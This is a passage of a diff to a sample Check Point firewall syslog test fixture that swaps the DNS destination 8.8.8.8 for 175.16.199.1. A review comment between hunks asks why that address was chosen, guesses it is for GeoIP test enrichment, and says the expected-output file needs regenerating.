ifname:"eth1"; logid:"0"; loguid:"{0x5e812da5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524133"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:22:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812daf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524143"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45770"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:22:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812da5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524133"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46934"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:22:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e812daf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524143"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45770"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:22:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:22:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59248"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10870"; xlatesrc:"0.0.0.0"] 
@@ -7010,7 +7010,7 @@ <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61286"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10874"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60198"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:22:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812db7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41206"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10875"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:22:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812db9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524153"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38693"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:22:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812db9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524153"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38693"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:22:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812dbe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50174"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:22:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812dbe,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43324"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10876"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:22:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; 
loguid:"{0x5e812dc3,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; additional_info:"Authentication method: Local bind"; administrator:"localhost"; client_ip:"127.0.0.1"; machine:"gw-da58d3"; operation:"Log In"; operation_number:"10"; product:"query-database"; subject:"Administrator Login"] 
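Review bot: The replacement `dst:"175.16.199.1"` in this hunk (and the same substitution in the neighbouring hunks) is a routable public address rather than an RFC 5737 documentation address such as 192.0.2.0/24, so the fixture still names a real third-party host; the reason this particular value was chosen is not recorded anywhere visible. If the goal is deterministic GeoIP enrichment in the module's pipeline tests, 175.16.199.1 is presumably used because it resolves in the GeoIP test database, and a sentence saying so in the commit description would spare the next maintainer from "fixing" it to a documentation range and breaking the geo assertions. Any generated expected-output file for this sample log has to be regenerated in the same change so the `dst` and the derived destination fields stay consistent; that file is not visible here.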
@@ -7074,21 +7074,21 @@ <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41330"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10893"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49477"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:25:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e82,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61414"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10894"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T23:26:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:26:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:26:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e96,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:26:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812e98,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:26:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e9f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524383"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:26:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ea9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524393"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:26:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524403"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55965"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:26:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ebd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524413"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36744"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:27:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ec7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524423"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50482"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:26:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812e9f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524383"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36245"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:26:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ea9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524393"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48406"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:26:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812eb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524403"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 